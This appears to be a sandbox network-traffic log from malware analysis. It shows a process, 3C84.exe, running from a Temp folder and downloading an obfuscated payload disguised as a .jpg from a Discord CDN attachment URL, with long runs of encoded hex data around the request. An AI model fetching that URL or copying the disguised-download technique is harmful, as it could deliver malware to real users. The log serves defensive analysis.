2021-10-29 18:50:18 UTC	2549	IN	Data Raw: 78 20 74 6b 20 78 20 6b 4b 20 78 20 52 74 20 78 20 6b 4f 20 78 20 4f 78 45 20 78 20 59 4b 20 78 20 74 4f 20 78 20 4f 78 6f 20 78 20 59 52 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 45 20 78 20 52 6b 20 78 20 4f 6f 78 20 78 20 52 52 20 78 20 6b 4b 20 78 20 52 74 20 78 20 52 6b 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 74 20 78 20 4f 78 59 20 78 20 59 4f 20 78 20 6b 4f 20 78 20 4f 78 74 20 78 20 52 6b 20 78 20 74 45 20 78 20 4b 51 20 78 20 52 52 20 78 20 52 74 20 78 20 74 78 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4f 78 78 20 78 20 52 74 20 78 20 6b 4f 20 78 20 6b 51 20 78 20 4f 78 52 20 78 20 6b 51 20 78 20 52 51 20 78 20 6b 45 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 74 20 78 20 59 4f 20 78 20 6b 4f 20 78 20 4f 78 74 20 78 Data Ascii: x tk x kK x Rt x kO x OxE x YK x tO x Oxo x YR x Kt x Kt x KE x Rk x Oox x RR x kK x Rt x Rk x RY x RR x kt x OxY x YO x kO x Oxt x Rk x tE x KQ x RR x Rt x tx x Rk x Kt x Oxx x Rt x kO x kQ x OxR x kQ x RQ x kE x RY x OxE x RY x RY x Kt x YO x kO x Oxt x
2021-10-29 18:50:18 UTC	2565	IN	Data Raw: 4b 6b 20 78 20 6b 4f 20 78 20 4f 78 74 20 78 20 74 78 20 78 20 74 4f 20 78 20 51 74 20 78 20 52 6b 20 78 20 51 78 20 78 20 52 74 20 78 20 6b 6f 20 78 20 6b 59 20 78 20 52 59 20 78 20 74 45 20 78 20 4f 4f 6b 20 78 20 4f 78 4f 20 78 20 51 78 20 78 20 4f 4f 59 20 78 20 4f 78 78 20 78 20 52 51 20 78 20 74 4b 20 78 20 74 78 20 78 20 6b 51 20 78 20 52 52 20 78 20 52 59 20 78 20 74 51 20 78 20 4f 78 59 20 78 20 4f 6f 4f 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 78 59 20 78 20 4b 6b 20 78 20 6b 4f 20 78 20 4f 78 74 20 78 20 52 51 20 78 20 52 51 20 78 20 52 59 20 78 20 59 59 20 78 20 6b 6f 20 78 20 52 74 20 78 20 6b 6f 20 78 20 74 74 20 78 20 4f 78 59 20 78 20 6b 59 20 78 20 6b 4f 20 78 20 4f 78 74 20 78 20 52 51 20 78 20 52 59 Data Ascii: Kk x kO x Oxt x tx x tO x Qt x Rk x Qx x Rt x ko x kY x RY x tE x OOk x OxO x Qx x OOY x Oxx x RQ x tK x tx x kQ x RR x RY x tQ x OxY x OoO x Oox x OOk x Kt x Kt x OxY x Kk x kO x Oxt x RQ x RQ x RY x YY x ko x Rt x ko x tt x OxY x kY x kO x Oxt x RQ x RY
2021-10-29 18:50:18 UTC	2581	IN	Data Raw: 74 4f 20 78 20 4f 78 4b 20 78 20 4f 78 74 20 78 20 4f 4f 51 20 78 20 4b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 51 74 20 78 20 52 6b 20 78 20 4f 6f 6f 20 78 20 52 6b 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 59 4b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 6b 78 20 78 20 52 51 20 78 20 74 4b 20 78 20 74 59 20 78 20 74 6f 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 59 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 59 59 20 78 20 59 74 20 78 20 59 4f 20 78 20 6b 59 20 78 20 74 51 20 78 20 4f 78 45 20 78 20 4b 6b 20 78 20 59 4f 20 78 20 59 52 20 78 20 4b 74 20 78 20 59 59 20 78 20 4f 78 52 20 78 20 4b 74 20 78 20 52 59 20 78 20 52 59 20 78 Data Ascii: tO x OxK x Oxt x OOQ x Kk x RY x RY x Qt x Rk x Ooo x Rk x kO x RY x Rk x OOO x YK x RY x RY x RY x RY x tE x kx x RQ x tK x tY x to x RY x OOQ x Oxt x RY x RY x OxY x Ooo x RY x YY x Yt x YO x kY x tQ x OxE x Kk x YO x YR x Kt x YY x OxR x Kt x RY x RY x
2021-10-29 18:50:18 UTC	2597	IN	Data Raw: 20 52 59 20 78 20 74 4f 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 74 20 78 20 6b 59 20 78 20 52 59 20 78 20 51 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 6f 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 6f 20 78 20 52 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 6f 4f 20 78 20 52 59 20 78 20 74 4f 20 78 20 52 51 20 78 20 52 59 20 78 20 51 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 6b 59 20 78 20 52 59 20 78 20 6b 74 20 78 20 52 59 20 78 20 52 52 20 78 20 74 78 20 78 20 52 59 20 78 20 52 51 20 Data Ascii: RY x tO x Oxt x RY x Qk x OxE x RR x Oxk x RY x Rt x kY x RY x Qx x RY x RY x RY x RY x RY x RY x RY x ko x OOQ x RR x Oxk x RY x tO x Yo x RY x Qx x kO x RR x OoO x RY x tO x RQ x RY x Qk x RY x RY x RY x RY x RQ x kY x RY x kt x RY x RR x tx x RY x RQ
2021-10-29 18:50:18 UTC	2613	IN	Data Raw: 78 20 4f 78 4b 20 78 20 52 59 20 78 20 74 4f 20 78 20 4b 6b 20 78 20 52 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 52 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 6f 4f 20 78 20 52 59 20 78 20 74 4f 20 78 20 52 51 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 6b 51 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4b 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 52 20 78 20 52 59 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 6b 52 20 78 20 52 59 20 78 20 74 78 20 78 20 74 45 20 78 20 52 59 20 78 20 6b 4b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 Data Ascii: x OxK x RY x tO x Kk x RY x Qx x kO x RY x RY x RY x RY x RY x RY x kR x RY x RR x OoO x RY x tO x RQ x RY x Qk x OxE x RR x Ooo x RY x tO x OOQ x RY x kQ x kO x RR x Kk x RY x tO x YR x RY x QQ x OxE x RR x kR x RY x tx x tE x RY x kK x RY x RY x RY x RY
2021-10-29 18:50:18 UTC	2629	IN	Data Raw: 78 20 6b 6f 20 78 20 4f 6f 4f 20 78 20 51 74 20 78 20 6b 6b 20 78 20 51 78 20 78 20 4f 78 6b 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 74 51 20 78 20 4f 78 78 20 78 20 74 78 20 78 20 6b 52 20 78 20 4f 4f 74 20 78 20 51 6b 20 78 20 74 4f 20 78 20 59 74 20 78 20 4f 78 4b 20 78 20 51 78 20 78 20 52 51 20 78 20 6b 6f 20 78 20 4f 6f 4f 20 78 20 51 74 20 78 20 6b 6b 20 78 20 51 78 20 78 20 4f 78 6b 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4b 20 78 20 4f 4f 78 20 78 20 6b 6f 20 78 20 6b 78 20 78 20 51 51 20 78 20 74 4f 20 78 20 6b 52 20 78 20 4f 4f 74 20 78 20 6b 59 20 78 20 59 4f 20 78 20 4f 78 6b 20 78 20 4f 4f 52 20 78 20 6b 51 20 78 20 4f 78 51 20 78 Data Ascii: x ko x OoO x Qt x kk x Qx x Oxk x QQ x OxE x RY x RY x RY x RY x RR x tQ x Oxx x tx x kR x OOt x Qk x tO x Yt x OxK x Qx x RQ x ko x OoO x Qt x kk x Qx x Oxk x QQ x OxE x RY x RY x kK x OOx x ko x kx x QQ x tO x kR x OOt x kY x YO x Oxk x OOR x kQ x OxQ x
2021-10-29 18:50:18 UTC	2645	IN	Data Raw: 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 6f 78 20 78 20 74 51 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 74 6b 20 78 20 6b 4b 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 4f 4f 45 20 78 20 59 4b 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 59 74 20 78 20 4f 4f 74 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 59 59 20 78 20 4f 4f 4b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 59 4b 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 74 52 20 78 20 4f 4f 74 20 78 20 4f 4f 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 4f 4f 4b 20 78 20 4f 4f 4b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 74 4f 20 78 20 59 4b Data Ascii: x OxE x RY x RY x Oox x tQ x OOO x RY x RY x tk x kK x OOE x RY x RY x Rk x OOE x YK x OxE x RY x RY x Yt x OOt x OOO x RY x RY x RY x YY x OOK x RY x RY x RY x OxE x YK x OOQ x RY x RY x tR x OOt x OOY x RY x RY x Rk x OOK x OOK x RY x RY x RR x tO x YK

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49856	162.159.129.233	443	C:\Users\user\AppData\Local\Temp\3C84.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-29 18:50:19 UTC	2652	OUT	GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1 Host: cdn.discordapp.com
2021-10-29 18:50:19 UTC	2653	IN	HTTP/1.1 200 OK Date: Fri, 29 Oct 2021 18:50:19 GMT Content-Type: image/jpeg Content-Length: 345655 Connection: close CF-Ray: 6a5e96bebf540605-FRA Accept-Ranges: bytes Age: 89003 Cache-Control: public, max-age=31536000 ETag: "d05714d4497c7b55b2c0b1609cbd62c9" Expires: Sat, 29 Oct 2022 18:50:19 GMT Last-Modified: Tue, 26 Oct 2021 11:56:34 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Cf-Bgj: h2pri Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1635249394465681 x-goog-hash: crc32c=to49mQ== x-goog-hash: md5=0FcU1El8e1WywLFgnL1iyQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 345655 X-GUploader-UploadID: ADPycds4sIyz_GzjIugLy9_WqK029_2RU2KSIIfGlpMQJZx1WvXGDydhZDvUpsH4QNomt1ATbnkYUYcRxSnB_xGGebc X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c1XGQOw3yk2QLO0n7bjI35gsUVUgFYlNwFrUJOiPw6m5AzMpZaNl91s2djsUfXyFXaBR8yC%2FVDQODXgXu1SfvdfpvjUKBzyEB53iUo1JUPNb8DFGAj%2FvbQC1mOwhOgzBSqgRYA%3D%3D"}],"group":"cf-nel","max_age":604800}
2021-10-29 18:50:19 UTC	2654	IN	Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
2021-10-29 18:50:19 UTC	2654	IN	Data Raw: 78 20 52 51 20 78 20 74 6b 20 78 20 4f 6f 4f 20 78 20 51 78 20 78 20 6b 74 20 78 20 74 78 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 52 20 78 20 52 52 20 78 20 4f 6f 4f 20 78 20 51 6b 20 78 20 59 78 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 51 51 20 78 20 59 4f 20 78 20 74 6b 20 78 20 6b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 6b 20 78 20 52 59 20 78 20 52 51 20 78 20 74 6b 20 78 20 4f 4f 59 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 6b 45 20 78 20 74 4f 20 78 20 74 78 20 78 20 4f 4f 74 20 78 20 51 78 20 78 20 74 4f 20 78 20 4f 6f 78 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 4f 20 78 20 52 6b 20 78 20 6b 59 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 6f 20 78 20 6b 74 20 78 20 Data Ascii: x RQ x tk x OoO x Qx x kt x tx x Kk x Qx x kR x RR x OoO x Qk x Yx x tk x Oxk x QQ x YO x tk x kk x RY x RY x RY x Kk x RY x RQ x tk x OOY x Qk x YO x tk x Oxk x kE x tO x tx x OOt x Qx x tO x Oox x Oxk x RY x RR x kO x Rk x kY x Yx x kR x Kk x ko x kt x
2021-10-29 18:50:19 UTC	2655	IN	Data Raw: 20 78 20 6b 4f 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 59 74 20 78 20 4f 78 52 20 78 20 51 78 20 78 20 6b 6b 20 78 20 74 6b 20 78 20 4f 6f 6f 20 78 20 6b 4b 20 78 20 6b 74 20 78 20 6b 52 20 78 20 4f 4f 52 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 4b 20 78 20 59 45 20 78 20 52 59 20 78 20 74 59 20 78 20 52 51 20 78 20 52 52 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 59 20 78 20 74 6f 20 78 20 74 4b 20 78 20 4f 4f 6b 20 78 20 6b 51 20 78 20 59 78 20 78 20 6b 52 20 78 20 4f 6f 6f 20 78 20 51 51 20 78 20 4b 6b 20 78 20 74 78 20 78 20 4f 78 51 20 78 20 51 78 20 78 20 4f 78 51 20 78 20 4f 78 6b 20 78 20 4f 4f 74 20 78 20 51 74 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 59 45 20 78 20 6b 4b 20 78 20 6b 74 20 78 20 74 78 20 78 20 4f 6f Data Ascii: x kO x QQ x OxQ x Yt x OxR x Qx x kk x tk x Ooo x kK x kt x kR x OOR x Qk x YO x tK x YE x RY x tY x RQ x RR x ko x Yx x kR x Kk x kY x to x tK x OOk x kQ x Yx x kR x Ooo x QQ x Kk x tx x OxQ x Qx x OxQ x Oxk x OOt x Qt x kk x ko x YE x kK x kt x tx x Oo
2021-10-29 18:50:19 UTC	2657	IN	Data Raw: 6f 20 78 20 51 6b 20 78 20 6b 74 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 74 45 20 78 20 52 52 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 4b 20 78 20 6b 74 20 78 20 59 74 20 78 20 4f 78 74 20 78 20 4f 78 78 20 78 20 6b 74 20 78 20 4f 6f 78 20 78 20 4f 78 6b 20 78 20 6b 45 20 78 20 74 4f 20 78 20 74 78 20 78 20 4f 4f 74 20 78 20 51 78 20 78 20 74 4f 20 78 20 4f 6f 78 20 78 20 4f 78 6b 20 78 20 6b 52 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 52 20 78 20 52 59 20 78 20 74 78 20 78 20 74 6f 20 78 20 51 78 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 52 51 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 4f 78 6b 20 78 20 59 78 20 78 20 51 78 20 78 20 6b 52 20 78 20 6b 6f 20 78 20 59 45 20 78 20 51 Data Ascii: o x Qk x kt x kY x RY x RY x tE x tE x RR x ko x Yx x kR x Kk x kK x kt x Yt x Oxt x Oxx x kt x Oox x Oxk x kE x tO x tx x OOt x Qx x tO x Oox x Oxk x kR x OOQ x RY x RY x kR x RY x tx x to x Qx x kk x ko x RQ x QQ x OxQ x Oxk x Yx x Qx x kR x ko x YE x Q
2021-10-29 18:50:19 UTC	2658	IN	Data Raw: 51 6b 20 78 20 74 4f 20 78 20 6b 52 20 78 20 74 4f 20 78 20 51 74 20 78 20 6b 74 20 78 20 4f 6f 78 20 78 20 4f 78 6b 20 78 20 6b 4b 20 78 20 4f 78 51 20 78 20 74 78 20 78 20 4f 4f 52 20 78 20 51 78 20 78 20 6b 52 20 78 20 51 51 20 78 20 52 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 74 20 78 20 6b 4b 20 78 20 74 4f 20 78 20 59 74 20 78 20 4f 78 52 20 78 20 51 74 20 78 20 4b 51 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 51 51 20 78 20 59 78 20 78 20 59 74 20 78 20 4b 51 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 51 51 20 78 20 52 59 20 78 20 4f 78 74 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 6b 51 20 78 20 59 78 20 78 20 74 78 20 78 20 4f 4f 59 20 78 20 6b 6f 20 Data Ascii: Qk x tO x kR x tO x Qt x kt x Oox x Oxk x kK x OxQ x tx x OOR x Qx x kR x QQ x RY x RY x tO x kY x Rt x kK x tO x Yt x OxR x Qt x KQ x tK x Oxk x QQ x Yx x Yt x KQ x QQ x OxQ x tk x Oxk x RY x RY x RR x QQ x RY x Oxt x Oox x OOk x kQ x Yx x tx x OOY x ko
2021-10-29 18:50:19 UTC	2659	IN	Data Raw: 59 78 20 78 20 51 78 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 74 4f 20 78 20 6b 52 20 78 20 6b 4b 20 78 20 4f 78 78 20 78 20 74 6f 20 78 20 74 4b 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 4f 78 51 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 4b 51 20 78 20 4f 78 78 20 78 20 4f 6f 4f 20 78 20 51 74 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 6b 59 20 78 20 74 6f 20 78 20 74 4b 20 78 20 4f 4f 6f 20 78 20 4f 78 78 20 78 20 4f 78 51 20 78 20 74 78 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 52 20 78 20 52 52 20 78 20 4f 6f 4f 20 78 20 51 6b 20 78 20 59 78 20 78 20 51 78 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 74 4f 20 78 20 6b 52 20 78 20 6b 4b 20 78 20 4f 78 78 20 78 20 Data Ascii: Yx x Qx x OOo x Qk x tO x kR x kK x Oxx x to x tK x OOo x Qk x OxQ x Oxx x kk x RY x RY x Rt x OOE x RY x KQ x Oxx x OoO x Qt x kk x ko x Oxk x kY x to x tK x OOo x Oxx x OxQ x tx x Kk x Qx x kR x RR x OoO x Qk x Yx x Qx x OOo x Qk x tO x kR x kK x Oxx x
2021-10-29 18:50:19 UTC	2661	IN	Data Raw: 20 74 74 20 78 20 4f 78 6b 20 78 20 74 6b 20 78 20 4f 4f 74 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 51 74 20 78 20 74 4f 20 78 20 59 74 20 78 20 4b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 52 51 20 78 20 74 6b 20 78 20 4f 6f 4f 20 78 20 51 78 20 78 20 6b 74 20 78 20 74 78 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 52 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 6b 74 20 78 20 59 74 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 52 20 78 20 6b 6f 20 78 20 4f 4f 4f 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 4f 78 4b 20 78 20 51 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 52 52 20 78 20 74 78 20 78 20 51 6b 20 78 Data Ascii: tt x Oxk x tk x OOt x kQ x kk x RR x Ooo x Qt x tO x Yt x Kk x RY x RY x RR x OOE x RY x RQ x tk x OoO x Qx x kt x tx x Kk x Qx x kR x tK x Oxk x Qk x kt x Yt x Kk x Qx x kR x ko x OOO x QQ x OxQ x kR x OxK x Qx x RY x RY x RY x OOE x RY x RR x tx x Qk x
2021-10-29 18:50:19 UTC	2662	IN	Data Raw: 52 59 20 78 20 52 52 20 78 20 74 6b 20 78 20 52 59 20 78 20 4f 78 6b 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 4f 78 78 20 78 20 52 51 20 78 20 74 6b 20 78 20 4b 51 20 78 20 51 51 20 78 20 4f 4f 78 20 78 20 74 6b 20 78 20 4f 4f 6b 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 52 74 20 78 20 59 74 20 78 20 52 59 20 78 20 6b 59 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 6b 51 20 78 20 6b 74 20 78 20 6b 6f 20 78 20 52 6b 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 74 4b 20 78 20 4f 6f 6f 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 4b 20 78 20 6b 6b 20 78 20 52 59 20 78 20 74 78 20 78 20 4f 4f 59 20 78 20 52 52 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 59 20 78 20 59 4f 20 78 20 4f 78 6b 20 78 20 4f 6f 6f 20 78 20 6b 4f 20 78 20 59 78 Data Ascii: RY x RR x tk x RY x Oxk x tk x Oxk x Oxx x RQ x tk x KQ x QQ x OOx x tk x OOk x QQ x OxE x Rt x Yt x RY x kY x Oox x OOk x kQ x kt x ko x Rk x Oxx x kk x tK x Ooo x Qk x YO x tK x kk x RY x tx x OOY x RR x ko x Yx x kR x Kk x kY x YO x Oxk x Ooo x kO x Yx
2021-10-29 18:50:19 UTC	2663	IN	Data Raw: 51 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 51 78 20 78 20 59 78 20 78 20 4f 78 6b 20 78 20 4f 4f 74 20 78 20 6b 59 20 78 20 74 4f 20 78 20 74 78 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 78 20 78 20 59 52 20 78 20 52 59 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 4f 20 78 20 59 78 20 78 20 4f 6f 78 20 78 20 4f 4f 6f 20 78 20 51 78 20 78 20 6b 74 20 78 20 59 45 20 78 20 4b 6b 20 78 20 6b 59 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 6b 59 20 78 20 4f 78 78 20 78 20 4f 78 6b 20 78 20 4f 78 78 20 78 20 74 78 20 78 20 74 6b 20 78 20 59 45 20 78 20 51 51 20 78 20 59 4f Data Ascii: Q x tK x Oxk x Qx x Yx x Oxk x OOt x kY x tO x tx x OOo x Qk x OOx x kO x RY x RY x kx x YR x RY x ko x Yx x kR x Kk x kO x Yx x Oox x OOo x Qx x kt x YE x Kk x kY x OxQ x kR x OxR x Oxx x RY x RR x Oxx x RY x kY x Oxx x Oxk x Oxx x tx x tk x YE x QQ x YO
2021-10-29 18:50:19 UTC	2665	IN	Data Raw: 78 20 4f 78 74 20 78 20 51 6b 20 78 20 59 4f 20 78 20 51 51 20 78 20 52 59 20 78 20 4f 6f 4f 20 78 20 52 59 20 78 20 52 52 20 78 20 74 78 20 78 20 51 6b 20 78 20 4f 78 51 20 78 20 6b 6f 20 78 20 6b 4f 20 78 20 6b 51 20 78 20 6b 74 20 78 20 4f 78 6b 20 78 20 4f 4f 74 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 74 20 78 20 4f 4f 51 20 78 20 74 78 20 78 20 74 4b 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 51 78 20 78 20 4f 78 4b 20 78 20 51 6b 20 78 20 74 4f 20 78 20 4f 78 6b 20 78 20 4f 78 74 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 6b 59 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 52 20 78 20 6b 4f 20 78 20 52 Data Ascii: x Oxt x Qk x YO x QQ x RY x OoO x RY x RR x tx x Qk x OxQ x ko x kO x kQ x kt x Oxk x OOt x Oxx x RY x RY x RY x Oxt x OOQ x tx x tK x Qk x OOx x Qx x OxK x Qk x tO x Oxk x Oxt x kQ x kk x ko x Oxk x kY x OxQ x kR x OxR x Oxx x RY x RY x RY x OOR x kO x R
2021-10-29 18:50:19 UTC	2666	IN	Data Raw: 20 59 74 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 74 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 74 45 20 78 20 52 52 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 4b 20 78 20 6b 74 20 78 20 6b 52 20 78 20 4f 4f 74 20 78 20 4f 78 78 20 78 20 6b 59 20 78 20 4f 78 6b 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 74 20 78 20 4b 51 20 78 20 52 6b 20 78 20 51 6b 20 78 20 59 4f 20 78 20 6b 52 20 78 20 4f 4f 74 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 6f 20 78 20 6b 4f 20 78 20 74 78 20 78 20 74 6f 20 78 20 51 78 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 6b 4f 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 6b 4f 20 78 20 Data Ascii: Yt x OxR x Oxx x kk x tt x RY x RY x Rk x tE x RR x ko x Yx x kR x Kk x kK x kt x kR x OOt x Oxx x kY x Oxk x Kk x Qx x kt x KQ x Rk x Qk x YO x kR x OOt x Oxx x RY x RY x RY x ko x kO x tx x to x Qx x kk x ko x kO x kQ x kk x tK x Oxk x Qk x OOx x kO x
2021-10-29 18:50:19 UTC	2667	IN	Data Raw: 78 20 51 78 20 78 20 6b 59 20 78 20 6b 6f 20 78 20 4f 4f 6f 20 78 20 6b 51 20 78 20 6b 74 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 51 78 20 78 20 4b 51 20 78 20 52 52 20 78 20 4f 78 4b 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 74 78 20 78 20 4f 4f 52 20 78 20 6b 52 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 6f 4f 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 74 78 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 6b 52 20 78 20 4f 4f 52 20 78 20 6b 4f 20 78 20 59 78 20 78 20 4f 78 4b 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 74 4f 20 78 20 6b 6f 20 78 20 6b 6b 20 78 20 51 74 20 78 20 6b 74 20 78 20 59 45 20 78 20 4f 78 74 20 78 20 51 6b 20 78 20 59 4f 20 78 20 4f 78 78 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 74 74 Data Ascii: x Qx x kY x ko x OOo x kQ x kt x Oox x OOk x Qx x KQ x RR x 